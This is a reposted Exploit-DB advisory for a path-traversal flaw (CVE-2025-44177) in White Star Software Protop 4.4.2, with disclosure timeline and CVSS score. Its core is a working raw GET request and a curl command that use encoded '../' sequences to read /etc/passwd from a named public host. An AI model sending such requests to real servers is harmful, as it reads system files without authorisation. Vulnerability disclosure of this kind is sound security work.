[webapps] White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)
White Star Software Protop v4.4.2 存在本地文件包含漏洞 (LFI),攻击者可通过 `/pt3upd/` 端点利用 URL 编码遍历序列获取任意文件。该漏洞 CVSS 评分 8.2 分,已向厂商报告并修复。 2025-7-16 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:25 收藏
White Star Software Protop v4.4.2 存在本地文件包含漏洞 (LFI),攻击者可通过 `/pt3upd/` 端点利用 URL 编码遍历序列获取任意文件。该漏洞 CVSS 评分 8.2 分,已向厂商报告并修复。 2025-7-16 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:25 收藏
# Exploit Title: White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)
# Date: 2025-07-09
# Exploit Author: Imraan Khan (Lich-Sec)
# Vendor Homepage: https://wss.com/
# Software Link: https://client.protop.co.za/
# Version: v4.4.2-2024-11-27
# Tested on: Ubuntu 22.04 / Linux
# CVE: CVE-2025-44177
# CWE: CWE-22 - Path Traversal
# Description:
# A Local File Inclusion vulnerability exists in White Star Software Protop v4.4.2.
# An unauthenticated remote attacker can retrieve arbitrary files via
# URL-encoded traversal sequences in the `/pt3upd/` endpoint.
# Vulnerable Endpoint:
GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: client.protop.co.za
User-Agent: curl/8.0
Accept: */*
# Example curl command:
curl -i 'https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd'
# Notes:
# - Vulnerability confirmed on public instance at time of testing.
# - CVSS v3.1 Base Score: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)
# - The vendor was notified and a fix was issued.
# Disclosure Timeline:
# - Discovered: 2025-03-13
# - Disclosed to vendor: 2025-03-20
# - CVE Assigned: 2025-07-01
# - Public Disclosure: 2025-07-09
文章来源: https://www.exploit-db.com/exploits/52367
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh